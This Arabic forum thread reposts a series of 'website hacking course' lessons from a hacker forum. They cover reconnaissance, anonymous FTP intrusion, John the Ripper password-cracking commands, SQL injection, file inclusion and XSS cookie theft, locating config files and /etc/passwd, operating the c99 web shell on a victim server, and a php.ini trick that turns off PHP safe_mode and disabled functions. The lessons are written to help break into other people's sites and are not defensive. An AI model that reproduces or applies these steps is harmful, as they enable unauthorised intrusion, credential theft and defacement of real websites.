دخول الدردشة

مركز تحميل Top4toP


الامتدادات المسموحة: PMB | JPG | JPEG | GIF | PNG | ZIP

وســع صــدرك



إضافة رد
 
أدوات الموضوع انواع عرض الموضوع
#1  
قديم 06-23-2012
عضو جديد
مصطفى النجفي غير متواجد حالياً
لوني المفضل Cadetblue
 رقم العضوية : 460
 تاريخ التسجيل : Nov 2011
 فترة الأقامة : 1020 يوم
 أخر زيارة : 09-27-2012 (03:03 PM)
 المشاركات : 12 [ + ]
 التقييم : 10
بيانات اضافيه [ + ]
افتراضي mahmad187@yahoo.com



:b b27:

السلام عليكم
أساسيات وكيفية اختراق المواقع - الشرح كامل وبالصور!
بسم الله والصلاة على رسول الله

اختراق المواقع يعتمد على الذكاء بالدرجة الاولى
عكس اختراق الاجهزه الذي يعتمد على البرامج
--------------------------------------------------
يعتمد شرحنا على عده اقسام....
1// جمع المعلومات
2// طريقة معرفه الاي بي من الـdos
3//البحث عن الثغرات
4//الهجوم عن طريق الاف تي بي
5//البرامج والادوات الضروريه((مع الشرح))

------------------------------------------------
(( كيفيه جمع المعلومات))
عندما تريد ان تخترق اي موفع يجب ان تعرف عنه وعن صاحبه كل شي.
وهذا سهل جدا
لان هناك مواقع تقدم لك هذا الخدمه ومنها...
Netcraft Ltd - Internet Research, Anti-Phishing and PCI Security Services
http://www.checkdomain.com/
Whois.net - Domain Names
ما عليك الا ان تضع اسم الموقع وتضغط بحث((search)) او((go))
-----------------------------------------------
((معرفه الاي بي بالدوس))

اذهب الى استارتstart
ومنها تشغيل run
واكتب الامر command
واكتب فى شاشة الدوس التى ستظهر ping http://www./?????.com
حيث http://www.?????.com هو الموقع الضحية ((افتراضي)) وانتر
بيظهر لك الاي بي
-------------------------------------------------
((البحث عن الثغرات وعمليه الاسكان))

هناك عدة برامج تقوم بهذا العمل ولكن ساقدم لك برنامج حلو اسمه(((عمران)))

------------------------------------------------
((الهجوم عن طريق الاف تي بي))

قم بتجربه الهجوم من خلال برنامج
ws-ftp او cuteftppro

مع تغيير البورت من 21 الى 80 او المنفذ الذى ظهر اليك مفتوح فى خيارات الادفاسيد advanced الموجودة فى الشاشة الابتدائية للبرنامج
قم بكتابة مكان host رقم الاى بى الخاص بالموقع او عنوان الموقع عن طريق الاف تى بى وغالبا ما يكون ftp.sitename.address
sitename = اسم الموقع
address = الامتداد .com او .net ....الخ

فى المرة هذه الخطوة قم بالدخول بصفة زائر
وذلك عن طريق وضع علامة صح امام كلمة anonymous
وسيقوم البرنامج وضع كلمة السر الافتراضية لدخولك أو
ضع مكان الباسووورد اي ايميل براسك
اذا تمت عملية الدخول قم بالتاكد انك ليس فى قسم الزوار وستكون ملحوظة فان قسم الزوار يكون فارغ
اذا وجدت نفسك تتنقل بين ملفات الموقع فستكون بذلك قد اخترقت الموقع
((موقعين اخترقناهم بهالطريقه))
-----------------------------------------------
عندما تخترق موقع سيكون غالبا الباسووورد مشفر
ولكن هناك برامج تفك تشفير الباسووورد
ومنها ....
جوهين
crack0MD5
PasswordsPro
الكاسر
او من خلال هذا الموقع
Passwords recovery - MD5, SHA1, MySQL
------------------------------------------

ومن ثم نفتح ملف نصي جديد داخل الـrun
ونضع الباسووورد واسم الادمن ونحفظه بأسم pass
كما في الشكل التالي..
1- امر يبحثلك عن الكلمات المحتملة من خلال قوائم بكمات السر المعدة مسبقاً مثل الورد لست
john -w:wordlist.txt pass.txt
---------------
2- امر يبحثلك عن كلمات السر التي تكون مطابقة لأسم المستخدم
john -single pass.txt
---------------
3- امر يبحث لك عن الحروف الصغيرة
john -i:Alpha pass.txt
---------------
4- امر يبحث لك عن جميع الأحتمالات الممكنة وهذا الأمر سوف يكسر كلمة السر لا محالة بأذن الله لأنه بيجرب جميع الأحتمالات:_
john -i:all pass.txt
---------------
نفرض انه طالت معك الامور ومليت شو تعمل لغلقه واكمال البحث مره اخرى في اي وقت
كل ما عليك هو ادخال الامر التالي :_

(( Ctrl+C ))

وسوف يتوقف البرنامج عن العمل واذا ارت العوده اليه في وقت لاحق لاكمال بحثك ادخل الامر التالي :_

(( john -restore ))


------------------------------------------
الآن سنعمل على برنامجcrack0MD5

1/لتحميل الباسووورد من ملف
2/لاختيار الباسووورد يدوي
3/للحذف
4/حول البرنامج
6/لاختيار كيفيه الفك((ارقام او حروف صغيره كبيره...الخ))
7//البدء بالعمليه((ولاحظ اسفل الشاشه..))ستجده بداء بعمليه الكشف

-----------------------------------------

الكاسر ((لاخونا العقرب الاسود))
ويعيب هذا البرنامج انه لا زم يكون عندك لسته باسوووردات.
ولكن عندي الحل..بس خلينا نشرحه اول
[IMG]file:///E:/Arab Hackers/دروس مصورة/هاكر المواقع/S2/t2/9.jpg[/IMG]
1/ضع الكلمه المشفره
2/قم بتحميل الكلمات المراد تخمينها
3/بدعمليه الكسر
4/ظهور الباسوورد عند فكه


الحــــــل...
في برنامج ChaosGen لتوليد
1 و2 و3و4 تختار ماتريد((ارقام ..حروف كبيره وحروف صغير..رموز)) الذي تريد
وممكن تضع خيارين مع بعض او ثلاثه او الكل
5// عدد الكلمات
6//عدد الخانات بالكلمه
7//البد بعمليه التوليد
8//حفظها((ومن المستحسن وضعها ملف مع برنامج الكاسر))
================================
الان ماعليك الا البحث عن ثغرات وتطبيقها

ساعد في نشر والارتقاء بنا عبر مشاركة رأيك في الفيس بوك





رد مع اقتباس
قديم 06-23-2012   #2
المدير العام


الصورة الرمزية user
user غير متواجد حالياً

بيانات اضافيه [ + ]
 رقم العضوية : 449
 تاريخ التسجيل :  Oct 2011
 أخر زيارة : 02-25-2013 (10:07 PM)
 المشاركات : 3,054 [ + ]
 التقييم :  10
 الدولهـ
Iraq
 الجنس ~
Male
 MMS ~
MMS ~
 SMS ~
قـــد اكـــــون علامه ؟ لدى البـــــــعض.....}
لوني المفضل : Palevioletred
Whistling



السلام عليكم
كيف حالك
منور حبيبي

اول شي شكراا ع الطرح الجميل


ثانياااا يرادله مهارات اوسع

شكرا الك مره ثانيه

وشي حلووووووووووووووووووووو
وتسلم ع الجهود رائعه اتمنالك الموفقيه
بحياتك


تحيتي

الع ،ــــــــــــنصر المح ــــــــــــايد


 
مواضيع : user



رد مع اقتباس
قديم 06-24-2012   #3
عضو جديد


الصورة الرمزية مصطفى النجفي
مصطفى النجفي غير متواجد حالياً

بيانات اضافيه [ + ]
 رقم العضوية : 460
 تاريخ التسجيل :  Nov 2011
 أخر زيارة : 09-27-2012 (03:03 PM)
 المشاركات : 12 [ + ]
 التقييم :  10
لوني المفضل : Cadetblue
افتراضي هكر المدينه



اختراق المواقع , دورة اختراق المواقع , شرح اختراق المواقع , اقوى دورة اختراق المواقع , اختراق المنتديات

بسم الله الرحمن الرحيم

السلام عليكم ورحمة الله وبركاته

اخواني الأعزاء اعضاء منتديات جيوش الهكرز الكرام..!

اقدم لكم اليوم الدرس الثاني من دورة اختراق المواقع
[الدرس الثاني] كيف يعمل الموقع؟! ، وماذا احتاج لعمل موقع؟!

ودرسنا اليوم سيتكلم حول المواقع وكيف يعمل الموقع وماذا احتاج لعمل موقع!

في الدرس الأول شرحنا بعض المصطلحات والأساسيات المهمه مثل السيرفر والداتا سنتر وقواعد البيانات الخ... ، على الرابط التالي
http://www.aljyyosh.com/vb/showthread.php?t=17613
اللي ما شاهد الدرس السابق يعيده ويحفظه لانه الدرس هذا مبني عليه.!

الموقع ليعمل يحتاج الى Domain او ما يسمى بالنطاق (نطاق - دومين)
ويحتاج إلى استضافة.!

الموقع من اجل ان يعمل ويستطيع الدخول عليه الجميع وكل شخص من جهازه! يجب ان تكون ملفات الموقع موجوده على سيرفر (اي يجب ان يكون الموقع مستضاف على سيرفر) ، فإذا لم تملك استضافه لا تستطيع عمل موقع وكذلك الدومين.!

ماذا يعني الدومين او النطاق
كل دومين او نطاق هو عباره عن IP Address ، أي عنوان الأي بي، اي الدومين هو عنوان ، نأخذ مثال.!
تخيّل لو انه لا يوجد لك اسم ، فماذا سوف يُعرفونك الناس! ، بالتأكيد سيقولون ، الشب المسلم العربي الطويل الأبيض اللي شعره أصلع ولحيته طويله
شوف تعريفك كم طويل! ، فمثلا خلينا نشوف الجيوش
اي بي موقع جيوش الهكرز الحالي هو 93.186.192.164 ، تخيّل كل ما بدك تدخل على موقع جيوش الهكرز بدك تكتب هذا الرقم!!.!
مو حلو وصعب وغيّر مريح! ، فقد تم ايجاد شيء اسمه Domain Name اي النطاق بدل أي بي الموقع ، يتم ربط كل موقع بالأي بي الخاص فيه
aljyyosh.com = اسم النطاق (الدومين) ، عند كتابة aljyyosh.com سيفتح لك موقع جيوش الهكرز ، بمعنى ان aljyyosh.com هو الدومين.!
امثله على الدومينات
aljyyosh.com
aljyyosh.org
asdely.net
google.com
aljyyosh.info
الخ...


الإستضافه : الإستضافة هي ان يكون ملفات الموقع الخاصه بك موجود على سيرفر ، وقلنا هذا شرط اساسي ليعمل الموقع فالسيرفر هو جهاز متصل بالإنترنت طوال الوقت.! موجود عليه ملفات موقعك.!
تستطيع وضع اكثر من موقع على السيرفر الواحد اي انك تستطيع وضع عدة مواقع على سيرفر واحد وتستطيع وضع موقع واحد على السيرفر حسب ارادتك .! ، ومن هنا ظهر مصطلح اختراق جميع مواقع السيرفر فبهذه الدوره بالمرحله الثالثه سنشرح اختراق جميع مواقع اللي على السيرفر من خلال الحصول على موقع واحد!.!


 

رد مع اقتباس
قديم 06-24-2012   #4
عضو جديد


الصورة الرمزية مصطفى النجفي
مصطفى النجفي غير متواجد حالياً

بيانات اضافيه [ + ]
 رقم العضوية : 460
 تاريخ التسجيل :  Nov 2011
 أخر زيارة : 09-27-2012 (03:03 PM)
 المشاركات : 12 [ + ]
 التقييم :  10
لوني المفضل : Cadetblue
افتراضي هكر المدينه



اختراق المواقع , دورة اختراق المواقع , شرح اختراق المواقع , استغلال الثغرات , دورة استغلال الثغرات , الثغرات وانواعها , انواع الثغرات , دورة اختراق المواقع , اختراق المواقع , شرح اختراق المواقع , طريقة اختراق المواقع

بسم الله الرحمن الرحيم

السلام عليكم ورحمة الله وبركاته

اخواني الاعزاء اعضاء منتديات جيوش الهكرز الكرام
هذا الدرس مقدمن من منتديات جيوش الهكرز و ASDELY.NET بواسطة ASDELY-ScOrPiOn

اقدم لكم الدرس الثالث من دورة اختراق المواقع وهو الثغرات وانواعها


الثغره الأمنية هو خطأ برمجي يقع به المبرمج او مناطق ضعيفه الذي تؤدي إلى إستغلالها لصالح المخترق ، حيث بإمكان المخترق ان يضيف اكواده الخاصه الذي تساعده في إستغلال الثغره

فهناك الكثير من انواع الثغرات مثل

ثغرات sql Injection

وهي تكمن عن طريق إضافة أمر اخر إلى القاعدة بحيث يكون لصالح المخترق ويمكنه سحب معلومات من القاعدة
وهذا هو قسم دورة sql injection
http://www.aljyyosh.com/vb/forumdisplay.php?f=76

ثغرات Remote File Include

وتعني تضمين ملف خارجي إلى الموقع المستهدف , وبالعاده يكون هذا الملف الشيل ، وهذه الثغرات تقريباً انقرضت
سوف يتم وضع رابطها عند انهاء دورتها

ثغرات Command Execution

وهذه الثغره تمكنك من تنفيذ اوامر إلى النظام ، مثل اوامر اللينكس او الويندوز بحيث يمكنك على سبيل المثال من جلب الشيل (اداة للاختراق)
سوف يتم وضع رابطها عند انهاء دورتها

ثغرات Local File Include

وهي تضمين ملف محلي ، اي تكمن بتضمين ملف من موقع اخر لكن على نفس السيرفر ، وهي مشابهة لثغرات الريموت فايل انكلود
سوف يتم وضع رابطها عند انهاء دورتها

ثغرات الـ xss

هذه الثغره تكون عن طريق لغة الجافا سكربت ، وهي تساعدنا بسحب الكوكيز ، وما يهمنا هنا هو كوكيز المدير
سوف يتم وضع رابطها عند انهاء دورتها

للان بإمكانك البحث في المنتدى على شروحات لهذه الثغرات فستجد الكثير من الدورات من قبلي انا والاعضاء.!


لكي تخترق مواقع يجب ان تكون متقن للثغرات ، لان الثغرات هي اللي تمكنك من الوصول الى الموقع واختراقه او رفع شيل واختراق السيرفر

لإختراق موقع ليس بالضروره ان تكون متقن كل انواع الثغرات ، فربما تخترق موقع بثغرة sql injection او بثغرة xss او بثغرة Local File Include الخ... ، لكن كلما تكون متقن ثغرات اكثر تكون امكانية إستهدافك للموقع واختراقه اكبر.!

يوجد المزيد من انواع الثغرات فأنا ذكرت بعض منها فقط.!

سأشرح الثغرات المهمه في الدروس القادمه.! ، بالتوفيق للجميع

اخوكم ASDELY-ScOrPiOn
Aljyyosh.com && ASDELY.NET
بالتوفيق للجميع..!


 

رد مع اقتباس
قديم 06-24-2012   #5
عضو جديد


الصورة الرمزية مصطفى النجفي
مصطفى النجفي غير متواجد حالياً

بيانات اضافيه [ + ]
 رقم العضوية : 460
 تاريخ التسجيل :  Nov 2011
 أخر زيارة : 09-27-2012 (03:03 PM)
 المشاركات : 12 [ + ]
 التقييم :  10
لوني المفضل : Cadetblue
افتراضي هكر المدينه



بسم الله الرحمن الرحيم

السلام عليكم ورحمة الله وبركاته

اخواني الاعزاء اعضاء منتديات جيوش الهكرز الكرام

درس اليوم هو ، عن المسارات

الشرخ خاص بمنتديات جيوش الهكرز ، من شرح ASDELY-ScOrPiOn

ماذا اقصد بالمسارات؟!
اقصد بالمسارات هو مكان وجود الموقع على السيرفر + مكان وجود كونفيق سكربت معيّن + اذا رفعت ملف معيّن على موقع المخترق كيف تستعرضه بالمتصفح + معرفة مسار اليوزرات على السيرفر الخ...


عادتاً ، وليس دائما يكون مسار الموقع على السيرفر هو

كود:
/home/aljyyosh/public_html
aljyyosh = اسم اليوزر


يعني لنفرض ان الموقع هو aljyyosh.com واليوزر هو aljyyosh

احفظ جيدا public_html تساوي الرئيسية للموقع
فأي شيء يأتي بعد الـ public_html يأتي بعد اسم الموقع فورا
مثلا رفعنا ملف اسمه asdely.txt على مسار

كود:
/home/aljyyosh/public_html/asdely.txt
يكون رابطه

كود:
www.aljyyosh.com/asdely.txt
واذا رفعنا ملف اسمه asdely.txt على مسار

كود:
/home/aljyyosh/public_html/downlaods/asdely.txt
يكون رابطه

كود:
www.aljyyosh.com/downloads/asdely.txt
اظن انها وضحت الفكره


طيب هذا الرابط
www.aljyyosh.com/vb
كيف يكون مسار المنتدى على السيرفر؟!!
اكيد رح يكون بهذا الشكل

كود:
/home/aljyyosh/public_html/vb
طيب احتمال واحد يجي ويقولي يا ASDELY كيف بدي اطلع اليوزرات

اكيد رح اقول لك اليوزرات تكون على هذا المسار

كود:
/etc/passwd
طيب لما اليوزرات بهذا المسار كيف اطلعهم ؟!
رح ننفذ امر cat ، وهذا الامر يقوم بقراءة ملف
يعني يصير الامر كذه

كود:
cat /etc/passwd
البعض منكم رح يقول ، شو بتهبل هذا اسديلي ، يقول لنا تنفيذ امر وهو ما شرح لنا كيف ننفذ امر ، بقول لك انا شارحه بالدرس اللي بعده ، وهذا الدرس مجرد معلومات ولكن مهمة جدا ، ورح تعرف مدى اهميتها بعد مشاهدة الدرس الخامس
http://www.aljyyosh.com/vb/showthread.php?t=17614

========================

الحين رح اعطيكم شوية معلومات عن مسار كونفيقات لأشهر السكربتات (شرحت ايش معنى كونفيق في الدرس الأول)
طبعا السكربت = البرنامج الذي يعمل عليه الموقع مثل vBulletin (اي وهو المنتدى)


نبدأ الأن بسكربت ال vBulletin

يكون مسار الكونفيق كالتالي

كود:
/home/aljyyosh/public_html/path/includes/config.php
path = المجلد الموجود فيه سكربت المنتدى
مثل ما في موقعنا الغالي جيوش الهكرز
المجلد الموجود فيه السكربت هو vb
يعني مسار الكونفيق يكون

كود:
/home/aljyyosh/public_html/vb/includes/config.php
والأن مسار كونفيق السكربت المجاني الشهير Wordpress

يكون مسار الكونفيق كالتالي


كود:
/home/aljyyosh/public_html/path/wp-config.php
ومسار كونفيق سكربت joomla
يكون كالتالي

كود:
/home/aljyyosh/public_html/path/configuration.php
وكذالك سكربت الإستضافة WHMCS بنفس مسار الكونفيق


استضافات am4ss
/home/aljyyosh/public_html/path/requires/config.php

infinity
/home/aljyyosh/public_html/path/include/db.php


phpBB
/home/aljyyosh/public_html/path/config.php


ملاحظة:- احياناً يكون السكربت غير موضوع في مجلد
مثلا هنا www.aljyyosh.com يوجد منتدى
فمسار الكونفيق لا يكون هكذا

كود:
/home/aljyyosh/public_html/path/includes/config.php
بل يكون هكذا


كود:
/home/aljyyosh/public_html/includes/config.php
لمذا يكون هكذا؟! طبعا لانه واضع ملفات السكربت في مجلد public_html مباشره ، وليس داخل مجلد في ال public_html

تيحاتي للجميع ASDELY-ScOrPiOn
Aljyyosh.com


 

رد مع اقتباس
قديم 06-24-2012   #6
عضو جديد


الصورة الرمزية مصطفى النجفي
مصطفى النجفي غير متواجد حالياً

بيانات اضافيه [ + ]
 رقم العضوية : 460
 تاريخ التسجيل :  Nov 2011
 أخر زيارة : 09-27-2012 (03:03 PM)
 المشاركات : 12 [ + ]
 التقييم :  10
لوني المفضل : Cadetblue
افتراضي هكر المدينه



شرح شيل c99 شرح الشيل ، ما هو الشيل استخدام الشيل رفع الشيل طريقة اختراق المواقع

بسم الله الرحمن الرحيم



السلام عليكم ورحمة الله وبركاته


اخواني الأعزاء ، اعضاء منتديات جيوش الهكرز الكرام
اليوم شرح بالتفصيل عن الشيل وأوامر وأمثله للشيل ، والشرح رح يكون عن الشيل المسى ب c99



نبدأ الشرح على بركة الله


ما هو الشيل .؟! الشيل هو اداة مبرمجة بلغة ال php لإختراق المواقع والسيرفرات
طبعا يوجد شيل مو بلغة الphp وهو ال Ssh وطبعا هذا يكون في اللينكس
ولكل من يستخدم نظام لينوكس سوف يجد شيل لديه بإسم (الطرفية)


ماذا بإمكاننا ان نفعل اذا قمنا برفع شيل؟!
بكل بساطه اختراق جميع مواقع السيرفر


طبعا رفع الشيل يتم عن طريق ثغرات او عن طريق معرفة كلمة مرور للوحة تحكم منتدى او لوحة تحكم cPanel
وطبعا سوف تجدون شروحات رفع الشيل في دروس الدورة



الان صورة توضيحية للشيل c99






الان رح اشرح لكم خيارات الشيل ، يعني طرق استخدامه وتفاصيله وادواته
فمثلا يوجد في الشيل تنفيذ اوامر على السيرفر + يوجد في الشيل اتصال بقواعد البيانات + يوجد بالشيل رفع ملفات + يوجد بالشيل اتصال عكسي والكثير الكثير



نبدأ في شرح تنفيذ الأوامر في الشيل
Enter
ومعناها إدخال ، اي ادخال امر


وهذه صورة لخانة تنفيذ الأوامر





طبعا تكتب الأمر في الخانة ومن ثم تضغط على كلمة Execute
رح يتنفذ الأمر


مثال على تنفيذ الأمر


مثلا نريد ان ننشأ مجلد اسمه aljyyosh.com
نكتب mkdir aljyyosh.com
ومن ثم نضغط على Execute
ثم يجيب لنا مربع ومكتوب فيه الامر
نضغط Execute كمان مره


وهاذه صفحة يوجد فيها اوامر الشيل
http://www.aljyyosh.com/shell.html



طيب الحين نحن انتهينا من خانة تنفيذ الاوامر



الان رح نشرح خانة الرفع ، اكيد خانة الرفع ما بدها شرح لانها واضحه جدا


لكن رح نشرحها من شان ما تقول شبكة جيوش الهكرز قصرت معانا :p


انزل تحت في الشيل على ناحية اليمين
تجد كلمة Upload


وهذه صورة له





مثل منتم شايفين يا اعضاء الجيوش


نضغط على Browse لإستعراض ملف ونختار ملف اللي بدنا اياه من جهازنا ورح نرفعه



ومن ثم نضغط كلمة Upload لأجل رفع الملف
نقدر عن طريق الرفع اما نرفع اندكس الاختراق ويتم اختراق الموقع او رفع ادوات اخرى تساعدنا في اختراق السيرفر ، او ترفع اي شيء بدك اياه على السيرفر ، لعبه او صوره مثلاً


هيك بنكون كمان خلصنا من رفع الملفات




الان نشرح الصلاحيات والتصاريح
لانه قبل ان ننتقل لشرح التنقل في الشيل يجب شرح الصلاحيات والتصاريح


الصلاحيات الكثير منكم يا اعضاء جيوش الهكرز يعرفها ، طبعا اذا مو الاغلب
لكن رح اشرحها للمبتدأين



يوجد في السيرفرات صلاحيات ال nobody وال user وال root
طبعا صلاحيات النو بدي هي زائر
وصلاحيات اليوزر هي صاحب الموقع
وصلاحيات ال root مالك السيرفر



اذا كانت صلاحياتك على السيرفر هي nobody فبإمكانك التنقل بين المواقع
يعني تقدر تدخل اي موقع على السيرفر وتعرض ملفاته لكن صلاحيتك في الموقع اللي مرفوع لك عليه شيل صلاحية عادية وما تقدر ترفع ملفات او تعدل ملفات او تحذف ملفات الخ... على عكس صلاحية ال user
اما اذا كانت صلاحيتك user فأنت لك السيطره الكاملة على الموقع اللي مرفوع لك شيل عليه لكن لا تستطيع التنقل للمواقع الثانية على السيرفر عكس ال nobody
طبعا في الدروس القادمه سوف نشرح كيف تتنقل من موقع لموقع وتقرأ الملفات المهمة اللي رح تساعدنا باختراق الموقع مثل ال Config تم شرحها في الدرس الاول ،
واذا كان صلاحيتك على السيرفر هي root فانت صاحب السيرفر ولك الصلاحيات انك تعمل كل شيء وتقلب السيرفر فوقاني تحاتني :p



طبعا لمعرفة صلاحياتك على السيرفر نفذ امر
id عن طريق مربع تنفيذ الاوامر اللي شرحته بالأعلى
انا نفذته جاب لي
uid=505(clesdayi) gid=502(clesdayi) groups=502(clesdayi)
هاذا يعني صلاحياتي يوزر
وهاذا هو اسم اليوزر clesdayi




خلصنا من القسم الأول وهي الصلاحيات والان نبدأ في التصاريح


التصاريح شيء مهم جدا في الاختراق
فمثلا يوجد تصاريح 777 وتصاريح 755 وتصاريح 700 وتصاريح 644 خخخخ اذا بدي اعدها بده يطول الشرح على الفاضي
ولإعطاء مجلد او ملف تصريح تنفذ الأمر
chmod 777 namefile
namefile اسم المجلد او الملف
واعطيناه تصريح 777 اللي يحبه كل الهكر
فمثلا بدنا نعطي تصريح لمجلد aljyyosh.com اللي انشأناه في قبل ننفذ هاذا الأمر
chmod 777 aljyyosh.com



طبعا اذا كانت صلاحياتك على السيرفر user فلا يهمك اذا كان تصريح الملف 777 او 000 لانك لك سيطره كامله على الموقع اللي مرفوع عليه الشيل



فانت تحسب صاحب الموقع وبإمكانك تعمل اللي تبيه وترفع وتغير تصريح على كيفك



اما اذا كان صلاحياتك على السيرفر nobody
فلا تستطيع ان تعدل ملف او تمسح ملف او تغير فيه شيء الا اذا كان تصريحه 777 او المجلد اللي موجود فيه الملف اللي تبي تعدله يكون تصريحه 777
يعني مثلا انت تبي تعدل تصريح ملف اسمه asdely.php
والملف موجود في مجلد اسمه aljyyosh.com ، اذا صلاحياتك nobody يجب انه يكون تصريح مجلد aljyyosh.com هو 777
يعني اذا ملف تصريحه مو 777 ما تقدر تعمل فيه شيء



وهذه صورة من التصاريح





اذا شفت تصاريح بللون الاخضر فمعناها تقدر تعدل عليه
اما اذا شفت لون التصاريح باللون الأبيض فمعناها فقط تستطيع قرائته لكن ما تستطيع تعديله
اما اذا شفت تصاريح باللون الاحمر ، فمعناها لا ستطيع قرائته ولا تستطيع تعديله


ملاحظة : اذا كانت صلاحياتك user سوف يكون كل تصاريح الموقع اللي مرفوع عليه الشيل لونهم اخضر إلا اذا صاحب الموقع معدل على تصاريحهن ، وبما انك انت ايضاً لك سيطره تقدر تغير تصاريحهن كمان مره.

اما اذا كان صلاحيتك هي nobody فستجد ان الملفات هي باللون الأبيض واحيانا تجد ملفات باللون الاخضر وهذه الملفات او المجلدات اللي باللون الاخضر تقدر تعدل عليها فقط لا غيّر




الان انتهينا من شغلة التصاريح والصلاحيات واكيد اعضاء جيوش الهكرز فهموا الشرح



ننتقل الى سالفة التنقل في السيرفر



طبعا اذا كان صلاحياتك nobody تستطيع التنقل بين مواقع السيرفر كما شرحت سابقا
اما اذا كان user فلا تملك اي شيء خارج الموقع اللي انت رافع شيل عليه


والتنقل سهل جدا
وخانة التنقل تجدها تحت في الأسفل عند Go Dir او Go File



وهذه صورة من التنقل





home/aljyyosh/public_html/
aljyyosh = اسم اليوزر
طبعا اذا كانت صلاحيتك nobody تتنقل هيك على راحتك
تضع المسار اللي تبي تتنقل له ومن ثم تضغط على Go

هيك يكون انتهينا من شغلة التنقل يا اعضاء جيوش الهكرز


الان ننتقل ل الإتصال بالقواعد
وهي سهلة جدا جدا

في البداية ماذا يفيدنا الاتصال بقواعد البيانات؟! ، كما ذكرت سابقاً ان في قاعدة البيانات يتم تخزين معلومات الموقع مثل المواضيع الصور اسماء الاعضاء اسماء المدراء وايميلاتهم وباسوورداتهم في الموقع الخ..! ، فعندما نتصل بقاعدة بيانات موقع نقوم بسحب باسووردات المدير والدخول الى لوحة تحكم الموقع ومن ثم اختراقه.

شوف الصورة
يوجد كلمة sql جنب كلمة sec ، نضغط عليها



بعدها رح تيجي لنا مثل هذه الصورة



هنا تقوم بتعبئة بيانات القاعدة وسوف تقوم بالإتصال بها

Database اسم القاعدة
Username اسم مسخدم القاعدة
Password باسوورد القاعدة
Host خليه مثل ما هو ، لكن في احيان تكون مغيره ، تجيب بيانتها مو مشكلة
طبعا هذه البيانات تخرجها من ال config.php اللي في الموقع اللي تبي تخترقه

ومن ثم تضغط Connect

وهيك انت تتصل بالقاعدة
سنشرح في الدروس القادمه طرق التخطي والحصول على ملف الكونفيق حتى نتصل بالقاعدة

لتحميل الشيل من خلال صفحة برامج هكر الخاصة بالجيوش
على الرابط التالي
http://www.aljyyosh.com/hack.html


اخواني واحبائي اعضاء جيوش الهكرز الكرام
تم الشرح بواسطة اخوكم ASDELY-ScOrPiOn من جيوش الهكرز
الشرح بالتفصيل لأجل الكل يفهم ، وبعتقد هيك يكون غطينا الكثير الكثير عن الشيل
واصبح الكل يعرفه

اللي مش فاهم شيء يسأل في قسم المشاكل والاستفسارات وعيد الشرح حتى يفهم لانه صعب على المبتدأين.!

وبالأخر نرجو منكم الدعاء لنا

وتحياتي لكم ASDELY-ScOrPiOn

بالتوفيق..!


 

رد مع اقتباس
قديم 06-24-2012   #7
عضو جديد


الصورة الرمزية مصطفى النجفي
مصطفى النجفي غير متواجد حالياً

بيانات اضافيه [ + ]
 رقم العضوية : 460
 تاريخ التسجيل :  Nov 2011
 أخر زيارة : 09-27-2012 (03:03 PM)
 المشاركات : 12 [ + ]
 التقييم :  10
لوني المفضل : Cadetblue
افتراضي هكر المدينه



السيف مود تخطي السيف مود طريقة تخطي السيف مود شرح تخطي السيف مود ما هو السيف مود ماذا يعني السيف مود ايقاف السيف مود


بسم الله الرحمن الرحيم

السلام عليكم ورحمة الله وبركاته

اخواني الاعزاء اعضاء منتديات جيوش الهكرز

اقدم لكم اليوم ، تعريف ما هو السيف مود واين نجد السيف مود اذا اون او اوف.!


ما هو السيف مود؟!
السيف مود هو نظام حماية في السيرفرات ، يقوم بتفعيله بعض السيرفرات ، بحيث تقوم بتقييد البرمجيات على السيرفر مثل ال php ، وهو يقوم بحماية السيرفر من استخدام دوال واكواد خطره ، اي انه بمثابة نظام حماية للسيرفر


طيب كيف افحص السيف مود اذا شغال او موقف ، يعني اذا on او off ؟!
بسيط جداً ، بإمكانك فحص ذلك عن طريق الشيل ، إما شيل C99 او r57 او اي شيل اخر ، والسييف مود يكون موجود بأعلى الشيل.
تجد في الشيل كلمة مكتوبة
Safe-mode : او Safe-mode او Safe Mode

وبعدها يكون مكتوب اذا السيف مود شغال او غير شغال

وهذه صورة توضح حالة السيف مود

صورة تظهر ان السيف مود شغال


وهذه صورة بعد تخطي السيف مود وإيقافه ، وهنا يظهر وهو OFF




كيف اتخطى السيف مود؟!
لتخطي السيف مود هنالك الكثير من الطرق وسنتعلمها في الدروس القادمة باذن الله.!
الى الان انتهى الدرس الى هنا!


بالتوفيق للجميع


 

رد مع اقتباس
قديم 06-24-2012   #8
عضو جديد


الصورة الرمزية مصطفى النجفي
مصطفى النجفي غير متواجد حالياً

بيانات اضافيه [ + ]
 رقم العضوية : 460
 تاريخ التسجيل :  Nov 2011
 أخر زيارة : 09-27-2012 (03:03 PM)
 المشاركات : 12 [ + ]
 التقييم :  10
لوني المفضل : Cadetblue
افتراضي هكر المدينه



تخطي السيف مود ، شرح تخطي السيف مود ، شرح جعل السيف مود اوف ، شرح تخطي الحماية

بسم الله الرحمن الرحيم

السلام عليكم ورحمة الله وبركاته

اخواني الأعزاء الاعضاء الكرام ، اعضاء جيوش الهكرز

الكثير من الهكرز المبتدأين يحصلون على شيل على احدى السيرفرات لكن وللأسف بسبب السيف مود اون يتركوا السيرفر.
هنالك طرق كثيره لتخطي السيف مود وانا سوف أذكر في هذا الموضوع الطريقة الأولى

الشرح مقدم من منتديات جيوش الهكرز ASDELY-ScOrPiOn

سوف يكون شرحنا اليوم هو تخطي السيف مود عن طريق ملف php.ini

ماذا نعني بملف php.ini؟! :- ببساطة، هو ملف اعدادات لغة PHP على السيرفر، وهو يحدد كيفية تعامل السيرفر مع ملفات البي اتش بي على كل المواقع، أو على موقع واحد.
اللعبة تكمن هنا!! ، سوف نقوم برفع ملف php.ini على الموقع الذي نملك عليه شيل وسوف نعيّن في الملف بأن السيف مود هو off ، وعندها سوف تتغير السيف مود من اوف الى اون

طبعا عن طريق الملف هذا نستطيع تخطي الكثير من الاشياء او تفعيل الدوال الخ... ،

الطريقة
قم برفع الملف على الموقع مكان وجود الشيل الخاص بك. وسوف تجد ان السيف مود اصبح OFF

ماذا سوف نكتب في ملف php.ini
سوف نكتب التالي
safe_mode = OFF

لكن انا سوف اكتب التالي لكي اقوم بتفعيل الدوال ايضا

safe_mode = OFF
disable_functions = NONE

صورة قبل التخطي


صورة بعد التخطي



حمل ملف ال php.ini من المرفقات


بالتوفيق للجميع
وأي استفسار انا جاهز


 

رد مع اقتباس
قديم 06-24-2012   #9
عضو جديد


الصورة الرمزية مصطفى النجفي
مصطفى النجفي غير متواجد حالياً

بيانات اضافيه [ + ]
 رقم العضوية : 460
 تاريخ التسجيل :  Nov 2011
 أخر زيارة : 09-27-2012 (03:03 PM)
 المشاركات : 12 [ + ]
 التقييم :  10
لوني المفضل : Cadetblue
افتراضي هكر المدينه



